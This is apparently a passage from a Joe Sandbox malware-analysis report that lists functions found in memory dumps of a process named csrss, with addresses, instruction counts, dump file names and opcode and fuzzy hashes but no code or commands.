Instruction ID: b7f0f75f0920d1c44cabe2c937e64371b11aee894e6106f08e81cdf0cea5f789
Opcode Fuzzy Hash: fda569127d78f31da563cf7a96f8b291521fed619f195b9165391b6328691c7c
Instruction Fuzzy Hash: 1891B16184E3C68FF767CB2444152653FA2EF57205F0941FFE48DCB5A3EA19990E8382

Function 00007FFAAC5D613D Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829e69c7986c490c30b9c2ae51a4b980b6552cbc8935cc861dc7f8628db7c648
Instruction ID: a5d6b418fce572714ed3aee491c931d87129986f024c64aa0e129040ae88e5cd
Opcode Fuzzy Hash: 829e69c7986c490c30b9c2ae51a4b980b6552cbc8935cc861dc7f8628db7c648
Instruction Fuzzy Hash: ED61193958E64ACFFB69DB1884566F537C4EF86310B0446BAF05FC3592DD18E80B8781

Function 00007FFAAC4CD531 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73957d3a2d6c5beba689f8194e3568bc6bf75b1e8cc1c65963eafd439bc600a5
Instruction ID: e044c9b0fe99e97614842a00f3f488404ad2256b7aa8159f7348b824479a0dbc
Opcode Fuzzy Hash: 73957d3a2d6c5beba689f8194e3568bc6bf75b1e8cc1c65963eafd439bc600a5
Instruction Fuzzy Hash: 5161E334A0DC49CFE7A9DB18C84967437D1FF5A319B148275D44ECB6A1DE24E82AC7C4

Function 00007FFAAC5D7FE6 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d212941b7d3448b4a732e40d8a09cf36e658b7e0f21b1a4362dfdcf641ef0933
Instruction ID: d593d1e72b54f463fbe062c7ae75b417e93a085c7933133cb9af0fbe30db09db
Opcode Fuzzy Hash: d212941b7d3448b4a732e40d8a09cf36e658b7e0f21b1a4362dfdcf641ef0933
Instruction Fuzzy Hash: F361B22198EB47CBF36ADB68845577677E5EF86700F14857FE48EC2182DA28F40A87C1

Function 00007FFAAC5D7CA0 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24334a70a12b5bf43caffe6259b895ae98a39cf4fed77c99f5ec5fbf3eadee6e
Instruction ID: 6a5d32dd62612996efb3f17a890bcd1b3e70bd77ef3c8972d47d773406f0a824
Opcode Fuzzy Hash: 24334a70a12b5bf43caffe6259b895ae98a39cf4fed77c99f5ec5fbf3eadee6e
Instruction Fuzzy Hash: BF41B321A4E78BCFF367AB6858552B87FD4EF47250B0941FBE08DCB197D908984A83D1

Function 00007FFAAC4CBD11 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abed201edac4e9c7e24ac8e2528ee3469f5602b9ce0338b8bb0c514b92a2286d
Instruction ID: be24403348670d772fa66151c487f2ce1e7a6026f92e781745054ff5168fb709
Opcode Fuzzy Hash: abed201edac4e9c7e24ac8e2528ee3469f5602b9ce0338b8bb0c514b92a2286d
Instruction Fuzzy Hash: 78312631A1DA4D4FE759EB28D44AABD77E1EF8A310F0400BAD44EC32A2DD24EC428381

Function 00007FFAAC5D5937 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70b79d4b93aabf10e7491a9ba26f003a71b75f18730a8b59bf721781ae7f43da
Instruction ID: f8e2b7b61f7c0eac65a5dcb08cd62ba9ad3ed38a417572e25c0accba8942204f
Opcode Fuzzy Hash: 70b79d4b93aabf10e7491a9ba26f003a71b75f18730a8b59bf721781ae7f43da
Instruction Fuzzy Hash: 8B41523160CA59CFDF8DEB28C495EA4B7E1FBA9325B4441AAE00FC3552CE24E845CB91

Function 00007FFAAC5D0977 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b2a6eb5427d0f843e9ffa0f99eaf37ca45e1832d5bb453776ce20cfd7285cad
Instruction ID: 63e25e6835d892712731d016b67f372a1db53be73470ee8789908cf3d870aafc
Opcode Fuzzy Hash: 7b2a6eb5427d0f843e9ffa0f99eaf37ca45e1832d5bb453776ce20cfd7285cad
Instruction Fuzzy Hash: 5341463164CA49CFDF89EB58C455EA4B7E1FBA9310F0446AAE00FC7692DE35E845CB81

Function 00007FFAAC5DA867 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238bcaff456c898b4f1179a625466b4024dab51a90940a3258a141dd3b4b6f65
Instruction ID: 0d7ecf9fa809b9c94e6f646a24ce28e30542458b9e6db15b9ed1b232a0d585c7
Opcode Fuzzy Hash: 238bcaff456c898b4f1179a625466b4024dab51a90940a3258a141dd3b4b6f65
Instruction Fuzzy Hash: 6641743160CA49CFDF8CEB28C455EB5B7E1FBA9321B0445AAD00EC3656DE24E845CB91

Function 00007FFAAC5DA911 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68485a222c87f1d0e5041530f859b11efbcb330feaf2f1ebe88bbe1f3423c8e9
Instruction ID: 46fa2d94d85125b6bf688bf24d97e028cd532bd5cf474b533d35f7551787ad57
Opcode Fuzzy Hash: 68485a222c87f1d0e5041530f859b11efbcb330feaf2f1ebe88bbe1f3423c8e9
Instruction Fuzzy Hash: 7F31823160CA48CFDF8DEB28C059E64B7E1EBA9315B0445AAD01EC7296CE24E844CB91

Function 00007FFAAC5D0A21 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c7b2ee1118452de4e26db886e3f19cdcf6c97f6c42b24affe9ee46d7a1fa7d1
Instruction ID: f8c0cceaca7002193b0c4170f37c55cd6c2d34b590b34e82a374b789e226fea8
Opcode Fuzzy Hash: 7c7b2ee1118452de4e26db886e3f19cdcf6c97f6c42b24affe9ee46d7a1fa7d1
Instruction Fuzzy Hash: 8731863164CA498FDF49EB18C465EA4B7E1FBA9310B0446AED40FC7692CE35E845CBC1

Function 00007FFAAC5D59E1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ba3996228229c1762dcf2de6e829e73c0c215e4d2da339c48222cec10d6e0f
Instruction ID: 8723f442193b2d21974f86c7b7749d3213ebbf85f1f16a014eeaf6b0024a939b
Opcode Fuzzy Hash: a3ba3996228229c1762dcf2de6e829e73c0c215e4d2da339c48222cec10d6e0f
Instruction Fuzzy Hash: 3031643160CA498FDF8DEF18C495EA477E1FFA9315B0446AAE04EC7592CE24E845CB91

Function 00007FFAAC4CBB7D Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41933a758fe315f3aa809a3d8eb6b7280004a54b4ed0aefdb2539341b995cc3b
Instruction ID: 04bfa0b1b0dcc2e6d9bf56ab4d2b4319f585027ee9b7633e8569f205e5e03cfc
Opcode Fuzzy Hash: 41933a758fe315f3aa809a3d8eb6b7280004a54b4ed0aefdb2539341b995cc3b
Instruction Fuzzy Hash: 41312630A0891D8FDF84EF68C459EA97BF1FF69315B1440AAE00DD72A1DA35EC45CB80

Function 00007FFAAC5DCB9D Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b1d1aa7fe4f661441b9bb193745c22161ad0421b492d482365787bcff34d3bd
Instruction ID: f8629308ab32e40443b7fe54238fbd400098abf90bd326d88fd6f620d8ace35a
Opcode Fuzzy Hash: 7b1d1aa7fe4f661441b9bb193745c22161ad0421b492d482365787bcff34d3bd
Instruction Fuzzy Hash: 8821CA21A4DE0B4BF765E72C9455AF677E1EFE5350714817AE40EC31A6DD18F80643C4

Function 00007FFAAC5D597B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2dc6bb5361149e6343bcdd76a7ca6695110c3d9c6f0baac72941d218617ae71
Instruction ID: 8ccb05cae946b0bfc86bd66d271b82f322e10224e5bb9d8cecdaa211c70c3a82
Opcode Fuzzy Hash: e2dc6bb5361149e6343bcdd76a7ca6695110c3d9c6f0baac72941d218617ae71
Instruction Fuzzy Hash: 2031523160CA49CFDF8DEF28C495EA477E1FBA9315B0445AAE00FC7592CE28E845CB91

Function 00007FFAAC5D09BB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afa3636889fcedb1f9cca55e6b5bd1ff8b845238143120cb927f2eb1eccaca6b
Instruction ID: 82bf0c5d26bfed1454216016e8770327553eef165e2ff7e6e724cb13a9495d7d
Opcode Fuzzy Hash: afa3636889fcedb1f9cca55e6b5bd1ff8b845238143120cb927f2eb1eccaca6b
Instruction Fuzzy Hash: A931463164CA49CFDF59EB18C455EA4B7E1FBA9310B1446AAD00FC7692CE35E845CB81

Function 00007FFAAC5DA8AB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c007ad0d2c08d20006b85c2f22c94ec78744fd9c5f8c939b405aa345b0c95db4
Instruction ID: ba05a65615500c682c508bf842b5c3036319c5419cedc4d6237e6904deab1866
Opcode Fuzzy Hash: c007ad0d2c08d20006b85c2f22c94ec78744fd9c5f8c939b405aa345b0c95db4
Instruction Fuzzy Hash: 7631863160CA49CFDF8CEB28C055E75B7E1FBA9311B0445ADD00EC7696DE24E845CB81

Function 00007FFAAC4CF0A9 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8218a22a16434f033c9c244238d2f63bf035212c8d7b3c0db28064fb6c620830
Instruction ID: bdb9d8c256312943631367debcd61e6a6d742d843c6eeaeb598a9049d5db014b
Opcode Fuzzy Hash: 8218a22a16434f033c9c244238d2f63bf035212c8d7b3c0db28064fb6c620830
Instruction Fuzzy Hash: B831C46191E6C68BF76753A858590B97FA0DF4321CB1882BBD08DC61A3DD0C984AC399

Function 00007FFAAC4CD1DD Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae95a7d8d718128b88b5029e0f26a7fdacf4bb7281f8a47bbd08ddee6d0cae2
Instruction ID: 5b4133bc1b34f0cd8dbbb08352273c1f1f8376568f4f19e076a67e59dfe79adc
Opcode Fuzzy Hash: 6ae95a7d8d718128b88b5029e0f26a7fdacf4bb7281f8a47bbd08ddee6d0cae2
Instruction Fuzzy Hash: 8B31DC7190DA4DCFEB86DB54D8149FDBBB0FF45314F10417AE00EEB2A1CE28A9168B94

Function 00007FFAAC5D5745 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4802ded3fd1b5282232ce908de5c0818e50bec74467a55bb5fdfcfac7725ed77
Instruction ID: 81763c0ae3e4e4cf90f1246b42f4b0c66193866c3f0b6bb6d6458ecb2101d4ef
Opcode Fuzzy Hash: 4802ded3fd1b5282232ce908de5c0818e50bec74467a55bb5fdfcfac7725ed77
Instruction Fuzzy Hash: D93159B094A64BCFFF5ADB5484516BE7BB9FF45340FA0407BE00EC2581CA38A9489781

Function 00007FFAAC5D0785 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d91c3e4cbb6608deb41430b58cb44e364941476892448ce9872be1f2ecc49b
Instruction ID: 5041e57548151e24774db9e3458d6249c0ec8bedd661d2ebc4d621e55e785afd
Opcode Fuzzy Hash: 03d91c3e4cbb6608deb41430b58cb44e364941476892448ce9872be1f2ecc49b
Instruction Fuzzy Hash: 9A311830D8A64BCBEB9ADB5484556BD7BE4FF85300F50817AE00ED6581CE39A9888BC1

Function 00007FFAAC5DA675 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bf360b6cc107a53b6443a0b29ea99e9ebb77fc7a23013e987cec731aff69f34
Instruction ID: 5fb3f5273464510f692a47b0f6af1f3be75f9a0e34c5ac79ad40834522cfb858
Opcode Fuzzy Hash: 9bf360b6cc107a53b6443a0b29ea99e9ebb77fc7a23013e987cec731aff69f34
Instruction Fuzzy Hash: 31312830D5AA4BCFEB9ADB5484556BE77B5FF46300F50807BF00EE2181DA38E9489B81

Function 00007FFAAC5DB716 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8e3ae29c92c2b2e72d58a504d6a5991e8314de3d029383be59dacf9a5518cf
Instruction ID: 12ec97f57f1f0f1edbe5249cbdda4f218d1816eb45b410f623de43bfadc2c224
Opcode Fuzzy Hash: da8e3ae29c92c2b2e72d58a504d6a5991e8314de3d029383be59dacf9a5518cf
Instruction Fuzzy Hash: A9214F5294EB8A4FF796D338A859BB46F81DF56210F0441FBE04DCB297DC08984943D1

Function 00007FFAAC5D4631 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b879abf432ee302b0d510d5985c29b5bdb231a85ec751f18c460caa9b08fb4e
Instruction ID: 868611383094cfe40a0406ef97657c8a396ec9c77e07c0e0f21ac8feecce056b
Opcode Fuzzy Hash: 6b879abf432ee302b0d510d5985c29b5bdb231a85ec751f18c460caa9b08fb4e
Instruction Fuzzy Hash: BB31041085E6D7CAF31BC31848606B47B55EF8321171886B7E09B8B4CBCA1CE889D7C1

Function 00007FFAAC5D3211 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9567310b82fed25e3a13a22bee01088142b38a4fa5c56afa5447c5a22145da9e
Instruction ID: 05e3e0b36141ce3debbc9b7498682857659d36b8f6d5ce744992352c11cc2a80
Opcode Fuzzy Hash: 9567310b82fed25e3a13a22bee01088142b38a4fa5c56afa5447c5a22145da9e
Instruction Fuzzy Hash: 22212C31E9D707CBE66ACB1C944123573E5FF5A704B24843EE58FD3691DA24F90A86C1

Function 00007FFAAC5D9560 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 373c3d732a09cee1fc967bb40139e3d668e464f6439401705a0826d2efadf0df
Instruction ID: bdc21aee8b702b493dc69f13d02a67305516d382ed6254e00c3b6ddc50f9875b
Opcode Fuzzy Hash: 373c3d732a09cee1fc967bb40139e3d668e464f6439401705a0826d2efadf0df
Instruction Fuzzy Hash: AE31F65096E6978AF72BC35484646B47B55EF9331171886BBF09F8B1CBEC2CE848C381

Function 00007FFAAC4CF531 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 058f795ec5d2c5cfdc37929f9fe832e7a4e4b63c937c1845479bee7675067245
Instruction ID: 836360b3437b86fbd93629f82893f231a378b5a5eb9bfcb36ab370e7cdf3d81c
Opcode Fuzzy Hash: 058f795ec5d2c5cfdc37929f9fe832e7a4e4b63c937c1845479bee7675067245
Instruction Fuzzy Hash: 1C212E31A1D605CBF769DF18944903973E1FF5A71CB20943DD98FC32A2DA28F80A4789

Function 00007FFAAC4D0950 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da85b7ea494147f36ff66201657b87bb35d42c8ddaaf17ece6f1b00db688de9
Instruction ID: 009d705413279b44b954221927dfa541f09926514081d9cc8877c970f3e71e59
Opcode Fuzzy Hash: 6da85b7ea494147f36ff66201657b87bb35d42c8ddaaf17ece6f1b00db688de9
Instruction Fuzzy Hash: 3A31FC2081E596CBF72A971888686B47F51EF53304B1886FBC49E8B5C7C52CF489C7C5

Function 00007FFAAC5D7CF0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 040dd48e831a30e911eb9cf00af2030bf72ddfd9a61e96b1097558a17ee63448
Instruction ID: 31ff7d85e0fdbf18a8e97005fb6dd13e64c82f0498b243a09ebb2466f0b80ad4
Opcode Fuzzy Hash: 040dd48e831a30e911eb9cf00af2030bf72ddfd9a61e96b1097558a17ee63448
Instruction Fuzzy Hash: 7F21915194F7C7CFF3279B3418242B46FE45F4315171985FBE08D8A4DBD908984A83D2

Function 00007FFAAC5D5E15 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90c7e92b6f48450eb4229be6a2ebd7c4f9607018863e764bdb8a94e89d66eb6a
Instruction ID: 1dd94d9050a1d8e2f42a7b0f911cbf9c575c3311e3722f214ea95160c3607f10
Opcode Fuzzy Hash: 90c7e92b6f48450eb4229be6a2ebd7c4f9607018863e764bdb8a94e89d66eb6a
Instruction Fuzzy Hash: 5B216D7595DA4EDFEF85EB58D4906FCBBB1FF49310F4041BAE00EE3281DA24A8458B80

Function 00007FFAAC5D0F08 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 285f7094855f2d8228e8b44c7699961f827991f44910cab9113c2d9b28575bc3
Instruction ID: b9d683063591413dfcfcc7121203b877ce5f056deca198c1f679a4ba8b9824a7
Opcode Fuzzy Hash: 285f7094855f2d8228e8b44c7699961f827991f44910cab9113c2d9b28575bc3
Instruction Fuzzy Hash: 54215034D59A4ECFEB89DB58D454AED77F1FF99310F60407AE00EE3291DA24A8458781

Function 00007FFAAC4CF0F0 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e881d466a7b8554d382183840ab8648b173377db27faba0408fc3a6939e4ebe
Instruction ID: bdc06d18c23df31340937d229028b4355cfd927e8a75df706824f0ed1e6f9b7c
Opcode Fuzzy Hash: 5e881d466a7b8554d382183840ab8648b173377db27faba0408fc3a6939e4ebe
Instruction Fuzzy Hash: AA213A4195E6C28FF75753B858690756FA09F13228B1885FBD08D8A1A3ED0CAC4AC39A

Function 00007FFAAC4D0980 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204d08f99c2dd388aedae7c4e2ed1bbe7268fe897ad1b7e01e165a1c043a40e0
Instruction ID: 1660af98902413d1c2e04b0bdff65991f23564652da8ef4faf9ba98c159a7ee0
Opcode Fuzzy Hash: 204d08f99c2dd388aedae7c4e2ed1bbe7268fe897ad1b7e01e165a1c043a40e0
Instruction Fuzzy Hash: 32113D2091E46AC7FA29970484686B47A51FFA2308F14C6F7C44F8B5CAC93CF885C3C5

Function 00007FFAAC5D9590 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8006e4ae973d2ad9bbbcd2ef6075bea2c0a80c669d88dce82f621d9cc5bfa449
Instruction ID: f790088293252d91ab70cd06dbcedd11ebe3f298b389c8d3a96cd2e9341c77ea
Opcode Fuzzy Hash: 8006e4ae973d2ad9bbbcd2ef6075bea2c0a80c669d88dce82f621d9cc5bfa449
Instruction Fuzzy Hash: 6011D55097D56BC6FA2DD34880606B47255FF92312B148676F05F8B58AEC2CF884D3C0

Function 00007FFAAC5D4660 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcf4b650307adb877f9fc3f0a0de2764394bc41303c37cb55bff2b7467db8718
Instruction ID: 56bd64d11798cc0ca967d1612d6545a81be476a4d6f3923ec20eb158aa61520c
Opcode Fuzzy Hash: dcf4b650307adb877f9fc3f0a0de2764394bc41303c37cb55bff2b7467db8718
Instruction Fuzzy Hash: 8411C31095E56BCAF62DC70884646B47255FF92301B248676F05F8B4CACF2CF9859BC0

Function 00007FFAAC5DB4D6 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8f3c3751bae0f3c07dace5ca19c1c6d6ec1417c9d8ccd231a05002e1b30ddc
Instruction ID: 90bfb8d7d814f0575095883feea6851a11726d1e4a820e2876aacee897ddccdb
Opcode Fuzzy Hash: 0b8f3c3751bae0f3c07dace5ca19c1c6d6ec1417c9d8ccd231a05002e1b30ddc
